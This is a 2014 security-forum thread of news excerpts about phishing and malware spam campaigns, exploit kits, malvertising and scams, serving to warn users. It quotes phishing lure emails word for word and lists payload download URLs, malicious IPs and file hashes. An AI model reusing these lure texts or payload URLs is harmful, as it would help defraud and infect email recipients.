Aug 21, 2014 - "Fraudsters are targeting JPMorgan Chase & Co customers in an email "phishing" campaign that is unusual because it attempts to collect credentials for that bank and also infect PCs with a virus for stealing passwords from -other- institutions. The campaign, dubbed "Smash and Grab," was launched on Tuesday with a widely distributed email that urged recipients to click to view a secure message from JPMorgan, according to security researchers with corporate email provider Proofpoint Inc. JPMorgan, the No. 1 U.S. bank by assets, confirmed that spammers had launched a phishing campaign targeting its customers... the bank believes most of the spam was stopped by fraud filters at large Internet providers, adding that the email looked realistic because the attackers apparently used a screen grab from an authentic email sent by the bank. Users who click on a malicious link are asked to enter credentials for accessing accounts with JPMorgan. Even if they did not comply, the site attempted to automatically install the Dyre banking Trojan* on their PCs, according to Proofpoint. Dyre is a recently discovered piece of malware that seeks credentials from customers of Bank of America Corp, Citigroup Inc and the Royal Bank of Scotland Group PLC, according to email security firm Phishme."
* http://blog.malcovery.com/blog/dyre-banking-trojan-what-you-need-to-know

> https://www.brainyquote.com/quotes/quotes/b/benjaminfr122731.html
"Distrust and caution are the parents of security" - Ben Franklin

:mad: :fear::fear:

AplusWebMaster
2014-08-22, 15:49
FYI...

WordPress attacks exploiting XMLRPC
- http://myonlinesecurity.co.uk/ongoing-wordpress-attacks-exploiting-xmlrpc/
Aug 22, 2014 - "We are experiencing Ongoing WordPress attacks exploiting XMLRPC. There appears to be a massive attack on WordPress sites today. So far I have had almost -1600- blocked attacks against ONE of my WordPress sites... Anybody using WordPress should make sure that they are plugged and use a good security system to prevent or -block- these attacks. It appears to be using the attack mentioned in this post:
> http://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html
... -None- of the current wordpress security plugins will -block- this and you need to make sure that you have a strong random password on your admin account. The -only- way to block them is on the perimeter, that is use a firewall that blocks the offending IP numbers that are responsible for the attacks. They are all coming from other compromised servers or hacked users computers..."
(More detail at the URL's above.)
___

Fake ADP 'Anti-Fraud Secure Update' SPAM – PDF malware
- http://myonlinesecurity.co.uk/adp-august-22-2014-anti-fraud-secure-update-fake-pdf-malware/
22 Aug 2014 - "'ADP: August 22, 2014 Anti-Fraud Secure Update' pretending to come from ADP_Netsecure@ adp .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Dear Valued ADP Client,
We are pleased to announce that ADP Payroll System released secure upgrades to your computer.
A new version of secure update is available.
Our development division strongly recommends you to download this software update.
It contains new features:
The certificate will be attached to the computer of the account holder, which disables any fraud activity
Any irregular activity on your account is detected by our safety centre
Download the attachment. Update will be automatically installed by double click.
We value our partnership with you and take pride in the confidence that you place in us to process payroll on your behalf. As always, your ADP Service Team is happy to assist with any questions you may have...

22 August 2014 : 2014 Anti-Fraud Secure Update_08222014.zip (9kb)
Extracts to 2014 Anti-Fraud Secure Update_08222014.exe
Current Virus total detections: 3/54* . This 'ADP: August 22, 2014 Anti-Fraud Secure Update' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/81e695f628436a4850bec46b3f90906433a0d11ae163f298f48fae788362d29a/analysis/1408710186/

- http://threattrack.tumblr.com/post/95457720908/adp-anti-fraud-update-spam
22 Aug 2014 - "Subjects Seen:
ADP: August 22, 2014 Anti-Fraud Secure Update
Typical e-mail details:

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/0ce8b26a9ef99d5ebbb8f37a1f29e47d/tumblr_inline_napm4cGa8i1r6pupn.png

Malicious File Name and MD5:
2014 Anti-Fraud Secure Update_08222014.scr (840B3B6A714F7330706F0C19F99D5EB8)
2014 Anti-Fraud Secure Update_08222014.zip (AB0D93E0952BDCE45D6E6494DF4D94AD)

Tagged: ADP, Upatre
___

"FlashPack" - add-on targets Japanese users, leads To exploit kit
- http://blog.trendmicro.com/trendlabs-security-intelligence/website-add-on-targets-japanese-users-leads-to-exploit-kit/
Aug 21, 2014 - "... In order to affect users, this particular exploit kit does -not- rely on spammed messages or compromised websites: instead, it uses a compromised website add-on. This particular add-on is used by site owners who want to add social media sharing buttons on their sites. All the site owner would have to do is add several lines of JavaScript code to their site’s design template. This code is freely available from the website of the add-on. The added script adds an overlay like this to the site’s pages:
Added share buttons:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/toolbar.png
To do this, a JavaScript file on the home page of the add-on is loaded. This alone should raise red flags: it means that the site owner is loading scripts from an external server -not- under their control. It’s one thing if it loads scripts on trusted sites like Google, Facebook, or other well-known names; it’s another thing to load scripts on little-known servers with no name to protect. As it turns out, this script is being used for malicious purposes. On certain sites, instead of the original add-on script, the user is redirected to the script of FlashPack... loading the s.js file directly will simply load the “correct” script for the add-on. One site which, if found in the Referer header, will trigger the exploit kit is a well-known free blogging site in Japan. The exploit kit delivers various Flash -exploits- to -targeted- users... At least approximately 58,000 users have been affected by this attack, with more than 87% of these coming from Japan. The landing pages of the exploit kit are hosted in servers in the Czech Republic, the Netherlands, and Russia.
Number of hits by country from August 1 to 17
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/Number-of-Hits-by-Country-01.jpg
How can users and site owners prevent these attacks? Site owners should be very cautious about adding add-ons to their site that rely on externally hosted scripts. As shown in this attack, they are trivial to use in malicious activities. In addition, they can slow the site down as well. Alternatives that host the script on the same server as the site itself are preferable. This incident illustrates for end users the importance of keeping-software-patched. The vulnerability we mentioned above has been fixed for half-a-year. Various auto-update mechanisms exist which can keep Flash up-to-date..."

:fear::fear: :mad:

AplusWebMaster
2014-08-24, 13:17
FYI...

My Photos SPAM - malware
- http://myonlinesecurity.co.uk/photos-malware/
23 Aug 2014 - "'My Photos' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Very simple email with content just saying 'Please find attached photos of my birthday party.' This one is particularly nasty and dangerous because it doesn’t give any outward signs of infection. It downloads an auto-configure script from http ://construtoralondres.zip .net/JScript32.log which then attempts to send all traffic through a proxy server http ://supermercadorleves.ddns .net which then filters out UK banking traffic to another proxy where they can steal all your banking log on and account information. Each UK bank is sent to a -different- proxy where the sites are set up to intercept traffic to the genuine UK bank site. That way, you think that you are on the genuine UK bank site and you actually are, but the proxy between you and the bank can read -everything- you type or do on the bank site. You have absolutely no idea that this is happening & you still get a padlock in the address bar to say that you are on a safe site.

23 August 2014: My Photos.zip ( 8kb): Extracts to My Photos.exe
Current Virus total detections: 10/50* . All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
* https://www.virustotal.com/en/file/8ef000f729f060a55aabaae7f16dc0e4da1108cdb8fef189dbafaa5b220b5ff0/analysis/1408799346/

zip .net / 200.147.99.195: https://www.virustotal.com/en/ip-address/200.147.99.195/information/
- http://quttera.com/detailed_report/zip.net
Submission date: Aug 24 16:53:51 2014
Server IP address: 200.147.99.195
"Warning: This Website Is Blacklisted!..."

ddns .net / 8.23.224.108: https://www.virustotal.com/en/ip-address/8.23.224.108/information/
- http://quttera.com/detailed_report/ddns.net
Submission date: Aug 24 16:46:40 2014
Server IP address: 8.23.224.108
"Alert: Suspicious Content Detected On This Website!..."
___

Sony PlayStation Network taken down by attack
- http://www.reuters.com/article/2014/08/25/us-sony-network-idUSKBN0GP02620140825
Aug 24, 2014 - "Sony Corp said on Sunday its PlayStation Network was taken down by a denial of service-style attack and the FBI was investigating the diversion of a flight carrying a top Sony executive amid reports of a claim that explosives were on board. The company said in a posting on its PlayStation blog that no personal information of the network was accessed in the attack, which overwhelmed the system with heavy traffic..."

- http://www.reuters.com/article/2014/08/25/us-sony-network-idUSKBN0GP02620140825
Aug 25, 2014 - "Sony Corp's PlayStation Network was back online on Monday following a cyber attack that took it down over the weekend, which coincided with a bomb scare on a commercial flight carrying a top Sony executive in the United States. Sony said on its PlayStation blog that its PlayStation network had been taken down by a denial of service-style attack, which overwhelmed the system with traffic, but did not intrude onto the network or access any of its 53 million users' information..."

:mad: :fear: :sad:

AplusWebMaster
2014-08-25, 14:51
FYI...

Fake Invoice SPAM - PDF Malware
- http://myonlinesecurity.co.uk/please-find-attached-invoice-fake-pdf-malware/
25 Aug 2014 - "'Please find attached Invoice No.' < random number> pretending to come from portadown.372@eel .co.uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These emails are -not- being sent from eel .co.uk or edmundson-electrical .co.uk, As far as we can determine they have not been hacked or their website or email system compromised. The bad guys have just decided to use Edmundson Electrical Ltd as a way to persuade you to open the attachment and become infected. It is a follow on campaign from this Broadoak toiletries attack:
> http://myonlinesecurity.co.uk/invoice-951266-fake-pdf-malware/
Once again this email template has several different sized malwares attached to it and it appears random which version you get... Email looks like:
WALSALL
MAHON RD IND EST. PORTADOWN
CO. ARMAGH BT62 3EH
T:028 3833 5316
F:028 3833 8453
Please find attached Invoice No. 3036 – 8340637
Best
Branch Manager
Registered Office: PO Box 1 Knutsford Cheshire WA16 6AY ...

25 August 2014: 3036 – 8340637.zip (44kb): Extracts to Invoice 372 – 667911.exe
Current Virus total detections: 2/55*
25 August 2014: 0463 – 485325.zip (47kb): Extracts to Invoice 829 – 991882.exe
Current Virus total detections: 2/51**
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e9b4e4ffb3943a08bc1c7b7bc7548aa5ce6e53375514081caf8d8973eadf5c87/analysis/1408955315/

** https://www.virustotal.com/en/file/cbd0a0fe8caa5e02e05ae196b89d3d1d1f6f680b00403add549b12356e2d8013/analysis/1408955404/
___

Fake Fax SPAM - pdf malware
- http://myonlinesecurity.co.uk/fax-arrived-remote-id-866-905-0884-fake-pdf-malware/
25 Aug 2014 - "'A fax has arrived from remote ID ’866-905-0884' pretnding to come from RFaxSMTP MTGm <RIGHTFAX@ mtgmfaxmail .bankofamerica .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
A fax has arrived from remote ID ’866-905-0884′.
————————————————————
Transmission Record
Received from remote ID: ’866-905-0884′
Inbound user ID derek, routing code 669164574
Result: (0/352;0/0) Successful Send
Page record: 1 – 2
Elapsed time: 00:39 on channel 34 ...

25 August 2014: Fax_Remote_ID.zip ( 13kb) : Extracts to Fax_Remote_ID.scr
Current Virus total detections: 0/55* . This 'A fax has arrived from remote ID 866-905-0884' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/37bbf261819afd6fabb75cb8815d4651e09329ab5cb8fe0b01d376096f195ab6/analysis/1408971894/
___

Bank of America Activity Alert Spam
- http://threattrack.tumblr.com/post/95740068388/bank-of-america-activity-alert-spam
Aug 25, 2014 - "Subjects Seen:
Bank of America Alert: A Check Exceeded Your Requested Alert Limit
Typical e-mail details:
Activity Alert
A check exceeded your requested alert limit
We’re letting you know a check written from your account went over the limit you set for this alert.
For more details please check attached file

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4bf4d24ed5d86a6ec8c689e611edac36/tumblr_inline_navd12Tu861r6pupn.png

Malicious File Name and MD5:
report08252014_6897454147412.vcr (7ED898AA2A8B247F7C7A46D71B125EA8)
report08252014_6897454147412.zip (FF4C74D80D3C7125962D7316F570A7FF)

Tagged: Bank of America, Upatre
___

Facebook Work From Home SCAM
- http://www.hoax-slayer.com/facebook-work-from-home-program-scam.shtml
Aug 25, 2014 - "Message claims that Facebook has launched a new 'Work From Home' program that will allow users to make money from the comfort of their own homes... The message is a scam. Facebook has not launched such a program and has no connection to the scheme. The link in the message takes you to a fake Facebook Page that tries to trick you into paying four dollars for a dodgy 'Facebook Millionaire' kit. Fine print on the signup form indicates that your credit card will be charged $94 per month for continued access. Do -not- be tempted to participate in this -bogus- program.
> http://www.hoax-slayer.com/images/facebook-work-from-home-program-scam-1.jpg
... It claims that people can potentially make thousands of dollars per month but warns that only a limited number of 'positions' are available... If this message comes your way, do -not- click any links it contains..."
___

Fake ADP SPAM - PDF malware
- http://myonlinesecurity.co.uk/adp-invoice-week-ending-08222014-invoice-447589545-fake-pdf-malware/
25 Aug 2014 - "'ADP Invoice for week ending 08/22/2014 Invoice: 447589545' pretending to come from Billing.Address.Updates@ ADP .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Your most recent ADP invoice is attached for your review. If you have any questions regarding this invoice, please contact your ADP service team at the number or e-mail address provided on the invoice for assistance.
Thank you for choosing ADP for your business solutions.
Important: Please do not respond to this message. It is generated from an unattended mailbox.

25 August 2014: invoice_447589545.zip (10kb): Extracts top invoice_447589545.exe
Current Virus total detections: 2/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/511aae72f63fd0256b7210d8a20afc75df7d1225ac054ec732a7fee43d11657b/analysis/1408992097/
___

BoA Merrill Lynch CashPro Spam
- http://threattrack.tumblr.com/post/95756978548/bank-of-america-merrill-lynch-cashpro-spam
Aug 25, 2014 - "Subjects Seen:
Bank of America Merrill Lynch: Completion of request for ACH CashPro
Typical e-mail details:
You have received a secure message from Bank of America Merrill Lynch
Read your secure message by opening the attachment, securedoc.html. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it in a Web browser.
If you have concerns about the validity of this message, contact the sender directly.
First time users - will need to register after opening the attachment.

Malicious URLs:
161.58.101.183/handler/jxpiinstall.exe

Malicious File Name and MD5:
securedoc.html (D6E1DD6973F8FAA730941A19770C97F2)
jxpiinstall.exe (C3110BFDD8536DC627336D7F7A6CC2E7)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f63cc48713e65cd81bd3d292795f917a/tumblr_inline_navorjRagN1r6pupn.png

Tagged: Bank of America, Merrill Lynch, tuscas

161.58.101.183: https://www.virustotal.com/en/ip-address/161.58.101.183/information/

:mad: :fear: :sad:

AplusWebMaster
2014-08-26, 12:21
FYI...

Fake Vodafone SPAM
- http://blog.dynamoo.com/2014/08/vodafone-mms-service-malware-spam.html
26 Aug 2014 - "This -fake- Vodafone spam comes with a malicious attachment. There is not body text as such, the header reads:
From: Vodafone MMS service [mms813562@ vodafone .co.uk]
Date: 26 August 2014 12:00
Subject: IMG Id 813562-PictQbmR TYPE--MMS

The version I had was mangled and the attachment was just called noname which required a bit of work to turn into a ZIP file IMG Id 813562-PicYbgRr TYPE--MMS.zip which in turn contains a malicious executable Picture Id 550125-PicSfdce TYPE-MMS.exe This .EXE file has a VirusTotal detection rate of 3/55*. The malware then attempts to download additional components... This second component has a VirusTotal detection rate of 3/53**... I would recommend the following blocklist:
192.254.186.106 ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/fe088d41e44b4c63ea6c4ed572f4537dc19265bddc56a567b61587b35819511d/analysis/1409051519/

** https://www.virustotal.com/en-gb/file/8aa74dba2e258b6965c8e3e68480ac5912f52fd85dc6c96839cce0c23123e776/analysis/1409052175/

192.254.186.106: https://www.virustotal.com/en/ip-address/192.254.186.106/information/
___

Phishers hook Facebook Users via SMS
- https://blog.malwarebytes.org/fraud-scam/2014/08/phishers-hook-facebook-users-via-sms/
Aug 26, 2014 - "If you happen to receive an SMS message from a potentially unknown recipient with the following text—
wtf f***** remove this pic from Facebook. http ://bit[dot]do/fbnudephotos
... much like the fellow on the screenshot:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/SMS.png
...then you’ve been targeted by a phishing campaign. The bit .do link is the shortened URL for a publicly available HTML page hosted on a Dropbox account. It looks like this:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/dbox-phish.png
All links but one – the 'Get Facebook for iPhone and browse faster' link – lead to a 404 page. The aforementioned link leads to the actual iTunes app download page. The full code of the page is actually hex encoded and executed by the unescape () function... Once users provide their Facebook credentials to the page, these are then posted to a .PHP page hosted on 193[dot]107[dot]17[dot]68, which we found out to be quite a popular location for hosting malware. While this happens at the background, users are directed to the following screenshot which serves as humour, if not a “Gotcha!” after a successful con:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/unibrow.png
... Individuals or groups with bad intent have been using SMS as a way to -scam- people, either for their money or for their information. Senior Security Researcher Jérôme Segura have published a post entitled “SMS Scams: How To Defend Yourself”* back in 2013, which I recommend you... read as well. His thoughts on this kind of fraud remains relevant to this date..."
* https://blog.malwarebytes.org/intelligence/2013/07/sms-scams-how-to-defend-yourself/

193.107.17.68: https://www.virustotal.com/en/ip-address/193.107.17.68/information/
___

Vacation SCAMS ...
- https://blog.malwarebytes.org/fraud-scam/2014/08/leave-these-vacation-scams-at-the-border/
Aug 26, 2014 - "... common travel scams and things to be wary of right now... First up, we have an Infographic over at the Just the flight blog which details 40 tourist scams to avoid*, along with common locations for said scams:
* http://www.justtheflight.co.uk/blog/16-40-tourist-scams-to-avoid-this-summer.html
... Whether you’re being driven to fake hotels by taxi drivers in on the act, looking at bogus takeaway menus slipped under your hotel door, accosted by pretend policemen or trying to catch a fake baby (no really) thrown in your general direction by a scammer working with pickpockets... Next up, we have some advice on the South China Morning Post in relation to travelling alone**, which includes tips and advice alongside links to additional information. Well worth a look if you’re planning on upping sticks and going solo:
** http://www.scmp.com/magazines/48hrs/article/1574227/roam-alone-tips-single-traveller
Finally, there’s a device which can be placed inside jewelry and perform numerous functions while on the move, including sending alert messages*** in case of emergency:
*** http://www.bust.com/this-stylish-jewelry-could-keep-you-safe.html
Wherever you go, you can be sure con-jobs and fakeouts lie in wait and the sensible traveler will do a little background reading before wandering off to parts unknown. It pays to keep your wits about you whether at home or abroad..."
(More at the malwarebytes URL at the top.)
___

SourceForge sub-domain redirects to Flash-Pack-Exploit-Kit
- https://blog.malwarebytes.org/exploits-2/2014/08/sub-domain-on-sourceforge-redirects-to-flash-pack-exploit-kit/
Aug 25, 2014 - "We have talked about SourceForge before on this blog, in particular when they were associated with -bundled- software... take a look at an infected sub-domain hosted on SourceForge responsible for a drive-by download attack... This calls to stat-count .dnsdynamic .com a domain previously identified* as a source of malicious activity. This one is no different...
* https://www.virustotal.com/en/domain/stat-count.dnsdynamic.com/information/
... You may recognize the URL landing for the Flash Pack Exploit Kit. There is an interesting series of -redirections- ... The last URL is a Flash file, VT detection here:
> https://www.virustotal.com/en/file/6082e26c223171124388ba2cf01e65840ef997863f42e418998d97e4fbcd6803/analysis/1408996053/
... A Flash file with a peculiar name for its classes:
> https://www.virustotal.com/en/file/3fc9204595ccfacae5624653d96b95e60d25609f560e543054525ca2e56cb0b6/analysis/1408979154/
The payload (VT results**) is detected by Malwarebytes Anti-Malware as Trojan.Agent.ED... We have spotted similar redirections to the Flash Pack exploit kit in other popular sites as well. Whether is it part of a larger campaign is hard to say but it is particularly active at the moment. Drive-by download attacks are the number -one- vector for malware infections. Legitimate websites often fall victim to malicious -injections- stealing incoming traffic and sending it to booby-trapped pages. Within seconds, an unpatched computer could get infected with a nasty piece of malware..."
(More detail at the malwarebytes URL at the top.)
** https://www.virustotal.com/en/file/5df51346ec3d96e781650488caaad85e64afbd2c45ca6228f7c6eddeb70de464/analysis/1408996125/

dnsdynamic .com - 84.45.76.100: https://www.virustotal.com/en/ip-address/84.45.76.100/information/

:fear::fear: :mad:

AplusWebMaster
2014-08-27, 13:41
FYI...

Fake Invoice SPAM - malicious attachment ...
- http://blog.dynamoo.com/2014/08/morupule-coal-mine-malware-spam.html
27 Aug 2014 - "This -fake- invoice spam claims to be from a (real) coal mine in Botswana. But in fact the PDF file attached to the message is malicious.
From: Madikwe, Gladness [GMadikwe@mcm.co.uk]
Date: 27 August 2014 10:43
Subject: Tax Invoice for Delivery Note 11155 dated 22.08.14
Hello ,
Please find attached the invoice for delivery note 11155 which was created on the 22 . 08. 14 after a system error to process this tax invoice.
Thank you
Regards
Gladness B Madikwe
Sales & Marketing Clerk
Morupule Coal Mine ...

Screenshot: http://1.bp.blogspot.com/-1wXuSVrxknQ/U_2vj2r9FGI/AAAAAAAAFVs/qn_Ls8u3nTM/s1600/moropule.png

Neither the Morupule Coal Mine nor the Debswana Diamond Company mentioned in the disclaimer are anything to do with this spam email, in fact it originates from a -hacked- machine in India. The attachment has a VirusTotal detection rate of 5/54*. My PDF.. isn't good enough to tell you what this malware actually does, but you can definitely guarantee that it is malicious."
* https://www.virustotal.com/en-gb/file/b1b121a0ef68b7abf628b4bdf10d583e6996c35a1888779e78d75c2907aebdf7/analysis/1409133512/
___

Malvertising: Not all Java from java .com is legit
- http://blog.fox-it.com/2014/08/27/malvertising-not-all-java-from-java-com-is-legitimate/
Aug 27, 2014 - "... getting a Java exploit via java .com, the primary source for one of the most common used browser plugins? Current malvertising campaigns are able to do this... real-time advertisement bidding platforms being infiltrated by cyber criminals spreading malware... Malvertising has changed over the years starting with exploitation of weak advertisement management panels... evolved into pretending to be a legit third party advertiser with social engineering. The current malvertising techniques are quite deceptive and most of the times only noticeable at the client side... It can be a malicious advertiser 3 layers down in the chain but it can also be on the 1st level... observed multiple high-profile websites -redirecting- their visitors to malware... These websites have not been compromised themselves, but are the victim of malvertising. This means an advertisement provider, providing its services to a small part of a website, serves malicious advertisement aimed at infecting visitors with malware. While monitoring network traffic to and from workstations we observed a higher than usual amount of infections. When investigating these incidents in depth we noticed that they were infected with advertisements served via high-profile websites... the following websites were observed redirecting and/or serving malicious advertisements to their visitors:
Java .com
Deviantart .com
TMZ .com
Photobucket .com
IBTimes .com
eBay .ie
Kapaza .be
TVgids .nl
The advertisement in this case included the Angler exploit kit. Upon landing on this exploit kit a few checks were done to confirm whether the user is running a vulnerable version of either Java, Flash or Silverlight. If the user was deemed vulnerable the exploit kit would embed an exploit initiating a download of a malicious payload, in this campaign it was the Asprox malware. This whole process of malvertising towards an exploit kit is also visualized in the image at the top of this post. Please note, a visitor does -not- need to -click- on the malicious advertisements in order to get infected. This all happens silently in the background as the ad is loaded by the user’s browser... ... 3 IP’s having been associated with these domains:
198.27.88.157: https://www.virustotal.com/en/ip-address/198.27.88.157/information/
94.23.252.38: https://www.virustotal.com/en/ip-address/94.23.252.38/information/
178.32.21.248: https://www.virustotal.com/en/ip-address/178.32.21.248/information/
There is no silver bullet to protect yourself from malvertising. At a minimum:
- Enable click-to-play in your browser. This prevents 3rd party plugins from executing automatically.
- Keep all plugins running in the browser up-to-date using tools like Secunia PSI.
- Consider turning off unneeded plugins if you don’t use them. For example, Java can be installed without the web-plugin component lowering the risk of exploitation and infection..."
(More detail at the fox-it URL above.)
___

"Customer Statements" - malware SPAM
- http://blog.dynamoo.com/2014/08/customer-statements-malware-spam.html
27 Aug 2014 - "This brief spam has a malicious PDF attachment:
Fom: Accounts [hiqfrancistown910@ gmail .com]
Date: 27 August 2014 09:51
Subject: Customer Statements
Good morning,attached is your statement.
My regards.
W ELIAS

Attached is a file Customer Statements.PDF which has a VirusTotal detection rate of 6/55*. Analysis is pending."
* https://www.virustotal.com/en-gb/file/d4701c59264760f0d9a4e47cb9d7db9cb76445bf4f042c1d845ab5191f1cd689/analysis/1409135030/
___

Royal Bank of Canada Payment Spam
- http://threattrack.tumblr.com/post/95908793833/royal-bank-of-canada-payment-spam
Aug 27, 2014 - "Subjects Seen:
The Bank INTERAC to Leo Dooley was accepted.
Typical e-mail details:
The INTERAC Bank payment $19063.01 (CAD) that you sent to Leo Dooley, was accepted.
The transfer is now complete.
Message recipient: The rating was not provided.
See details in the attached report.
Thank you for using the Service INTERAC Bank RBC Royal Bank.

Malicious File Name and MD5:
INTERAC_PAYMENT_08262014.exe (B064F8DA86DB1C091E623781AB464D8A)
INTERAC_PAYMENT_08262014.zip (71239A9D9D25105CEC3DF269F1FDCA2D

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/fb4a2ec18d4a89785009fc1879506a92/tumblr_inline_nayu2cOUqn1r6pupn.png

Tagged: RBC, Upatre
___

AT&T DocuSign Spam
- http://threattrack.tumblr.com/post/95918175803/at-t-docusign-spam
Aug 27, 2014 - "Subjects Seen:
Please DocuSign this document: Contract_changes_08_27_2014 .pdf
Typical e-mail details:
Hello,
AT&T Contract Changes has sent you a new DocuSign document to view and sign. Please click on the ‘View Documents’ link below to begin signing.

Malicious URLs:
79.172.51.73/Docusign/wps/myportal/sitemap/Member/ATT/SignDocument/7c16d8c7-e5ad-4870-bb79-1c1e4c9b35d6&er=fb88d3b6-88f4-4903-ae77-41754063bd7c/Contract_changes_08_27_2014.zip
Malicious File Name and MD5:
Contract_changes_08_27_2014.zip (5ED69A412ADB215A1DABB44E88C8C24D)
Contract_changes_08_27_2014.exe (C65966CCA8183269FF1120B17401E693)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/2be088fa857d593c69b6a9644b1fec46/tumblr_inline_naz25ifIWp1r6pupn.png

79.172.51.73: https://www.virustotal.com/en-gb/ip-address/79.172.51.73/information/

Tagged: ATT, DocuSigin, Upatre

- http://myonlinesecurity.co.uk/please-docusign-document-contract_changes_08_27_2014-pdf-fake-pdf-malware/
27 Aug 2014
___

ADP Past Due Invoice Spam
- http://threattrack.tumblr.com/post/95917541998/adp-past-due-invoice-spam
Aug 27, 2014 - "Subjects Seen:
ADP Past Due Invoice
Typical e-mail details:
Your ADP past due invoice is ready for your review at ADP Online Invoice Management .
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Review your ADP past due invoice here...

Malicious URLs:
81.80.82.27/upload/portal.adp.com/wps/myportal/sitemap/PayTax/PayStatements/invoice_449017368.zip
Malicious File Name and MD5:
invoice_449017368.zip (CF55AD09F9552A80CD1534BD392B44D1)
invoice_449017368.exe (C65966CCA8183269FF1120B17401E693)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/595fe50ab5e77ca2c29866eed0475ea8/tumblr_inline_naz1pmSD3h1r6pupn.png

81.80.82.27: https://www.virustotal.com/en-gb/ip-address/81.80.82.27/information/

Tagged: ADP, Upatre
___

Fake Payment Advice SPAM - PDF malware
- http://myonlinesecurity.co.uk/payment-advice-note-27-08-2014-fake-pdf-malware/
27 Aug 2014 - "'Payment Advice Note from 27.08.2014' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Disclaimer:
This e-mail is intended solely for the use of the individual to whom it is addressed. Any views or opinions presented are solely those of the author and do not represent those of AL-KO KOBER Limited. It may also contain information, which may be privileged and confidential and subject to legal privilege. If you are not the intended recipient, you may not peruse, use, disseminate, distribute or copy this message. If you have received this message in error, please notify the sender immediately by email, facsimile or telephone and return or destroy the original message.
AL-KO KOBER Limited is Registered in England at Companies Registration Office Cardiff with Company number: 492005. AL-KO KOBER Limited, South Warwickshire Business Park, Kineton Road, Southam, Warwickshire, CV47 0AL.
Cell 270 547-9194

27 August 2014: Payment_Advice_Note_27.08.2014.PDF.zip (48 kb)
Extracts to Payment_Advice_Note_27.08.2014.PDF.scr
Current Virus total detections: 0/55* . This Payment Advice Note from 27.08.2014 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2423cecc3c6a33db524d3d067103f9685576c8d1317d7d279917de986057f9ba/analysis/1409154303/

:fear: :mad:

AplusWebMaster
2014-08-29, 03:09
FYI...

The ‘Unknown’ Exploit Kit ...
- https://blog.malwarebytes.org/exploits-2/2014/08/shining-some-light-on-the-unknown-exploit-kit/
Aug 28, 2014 - "... Unless you have tracked the drive-by / exploit kit scene from day one or been able to map it out down to the tiniest details, this is not something easy... A couple of weeks ago, we observed a new traffic pattern (new to us) that first caught our attention for a couple of reasons:
- The payload’s size did not match that of any URL from the capture
- The URL patterns were new
... This exploit kit targets two different pieces of software: Microsoft Silverlight and Adobe Flash. However, unlike some other exploit kits it will only push one exploit per load giving preference to Silverlight first and then Flash.
Attack paths:
Silverlight only:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/Silverlight_only.png
Flash only:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/Flash_only.png
Silverlight and Flash:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/Silverlight_and_Flash.png
All three successful paths lead to either a:
- Silverlight exploit
- Flash exploit
... Conclusions:
The payload appears to be a -browser- hijack whose goal is to illegally gain advertising revenue from infected computers. What is perhaps more puzzling is the fact that this exploit kit has been around for so long and yet has been so quiet, not to mention the fact that reproducing an infection even with the proper referers is rather difficult (IP blacklisting, geolocation, etc). Another big question remains: Why would the author(s) bother with such advanced fingerprinting and evasion techniques, something we don’t normally see in typical malware... this bit of research has brought up more questions than when we started. That is not unusual though, and at least some dots have been connected."
(More detail at the malwarebytes URL at the top.)

:fear::fear:

AplusWebMaster
2014-08-29, 13:39
FYI...

Fake 'new photo' SPAM - malware
- http://myonlinesecurity.co.uk/new-photo-malware/
